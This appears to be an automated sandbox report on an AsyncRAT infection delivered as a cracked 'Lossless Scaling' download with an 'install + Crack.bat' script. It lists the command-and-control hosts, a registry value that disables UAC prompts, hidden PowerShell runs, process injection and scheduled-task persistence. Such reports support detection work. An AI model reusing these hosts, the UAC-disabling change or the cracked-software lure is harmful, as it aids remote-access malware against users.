Analysis
-
max time kernel
294s -
max time network
298s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64 arch:x86 image:win11-20250217-en locale:en-us os:windows11-21h2-x64 system -
submitted
12/03/2025, 18:04
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
asyncrat
A 14
Default
nams.ddnsfree.com:409
aliomar.ooguy.com:409
MaterxMutex_Egypt409
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 800 powershell.exe 576 powershell.exe 3440 powershell.exe 1452 powershell.exe 768 powershell.exe 1800 powershell.exe 2924 powershell.exe 3136 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1872 LosslessScaling.exe 2404 RAR.exe 2416 dismhost.exe -
Loads dropped DLL 24 IoCs
pid Process 1872 LosslessScaling.exe 2416 dismhost.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1452 set thread context of 3664 1452 powershell.exe 133 PID 3440 set thread context of 236 3440 powershell.exe 136 PID 768 set thread context of 3544 768 powershell.exe 155 PID 1800 set thread context of 2924 1800 powershell.exe 158 PID 2924 set thread context of 2740 2924 powershell.exe 185 PID 3136 set thread context of 4624 3136 powershell.exe 187 -
Drops file in Program Files directory 31 IoCs
description ioc Process File created C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Lossless Scaling.lnk powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Lossless.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config powershell.exe File created C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\pt-BR\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\vi\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe powershell.exe File created C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\fa\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\zh-TW\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\pt-PT\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Lan.vbs powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ar\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\pl\LosslessScaling.resources.dll powershell.exe File created 
C:\Program Files (x86)\Lossless Scaling\ro\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\zh-CN\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\bg\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ko\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\config.ini powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Licenses.txt powershell.exe File created C:\Program Files (x86)\Lossless Scaling\es-ES\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll powershell.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000\Control Panel\Colors LosslessScaling.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1408376509-1621642251-2666462513-1000\{2A3842FA-063C-4776-851B-87930613CEF3} msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4308 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\lossless scaling.zip:Zone.Identifier msedge.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1980 schtasks.exe 1524 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 236 aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 496 msedge.exe 4068 msedge.exe 4140 identity_helper.exe 2360 msedge.exe 3684 msedge.exe 800 powershell.exe 576 powershell.exe 1872 LosslessScaling.exe 3440 powershell.exe 1452 powershell.exe 236 aspnet_compiler.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 236 aspnet_compiler.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 29 IoCs
pid Process 4068 msedge.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeRestorePrivilege 3896 7zG.exe Token: 35 3896 7zG.exe Token: SeSecurityPrivilege 3896 7zG.exe Token: SeSecurityPrivilege 3896 7zG.exe Token: SeRestorePrivilege 3720 7zG.exe Token: 35 3720 7zG.exe Token: SeSecurityPrivilege 3720 7zG.exe Token: SeSecurityPrivilege 3720 7zG.exe Token: SeDebugPrivilege 800 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 1872 LosslessScaling.exe Token: SeDebugPrivilege 3440 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 236 aspnet_compiler.exe Token: SeRestorePrivilege 4792 7zG.exe Token: 35 4792 7zG.exe Token: SeSecurityPrivilege 4792 7zG.exe Token: SeSecurityPrivilege 4792 7zG.exe Token: SeBackupPrivilege 3548 Dism.exe Token: SeRestorePrivilege 3548 Dism.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 1800 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 3136 powershell.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
pid Process 4068 msedge.exe 3896 7zG.exe 3720 7zG.exe 4792 7zG.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 4068 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1872 LosslessScaling.exe 236 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4068 wrote to memory of 1508 4068 msedge.exe 81 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 496 4068 msedge.exe 83 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://drive.usercontent.google.com/download?id=1dL2wmMpi_uKJtoSEMETL8qLy2IJ6kU0y&export=download&authuser=01⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe6aae3cb8,0x7ffe6aae3cc8,0x7ffe6aae3cd82⤵PID:1508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:22⤵PID:4472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:82⤵PID:2120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:12⤵PID:4848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:12⤵PID:2740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:12⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:82⤵PID:3104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:12⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:12⤵PID:4048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:12⤵PID:444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6208 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:12⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:12⤵PID:5076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:12⤵PID:1400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:12⤵PID:1388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:12⤵PID:2684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6800 /prefetch:12⤵PID:2672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:12⤵PID:2516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:12⤵PID:5004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:12⤵PID:2648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7064 /prefetch:22⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:12⤵PID:5072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:12⤵PID:2340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2572 /prefetch:12⤵PID:4872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:12⤵PID:1084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:82⤵PID:200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:12⤵PID:1896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:12⤵PID:916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:12⤵PID:3552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:12⤵PID:4052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:12⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:12⤵PID:4320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:12⤵PID:1008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6520 /prefetch:82⤵PID:576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3052 /prefetch:82⤵
- Modifies registry class
PID:1896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4556 /prefetch:12⤵PID:572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:12⤵PID:3500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:12⤵PID:4952
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1516
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3176
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4440
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\lossless scaling\" -spe -an -ai#7zMap2916:94:7zEvent264101⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3896
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\lossless scaling\lossless scaling\" -spe -an -ai#7zMap8418:128:7zEvent267921⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3720
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\lossless scaling\lossless scaling\install + Crack.bat" "1⤵PID:2816
-
C:\Windows\system32\net.exenet session2⤵PID:4048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4636
-
-
-
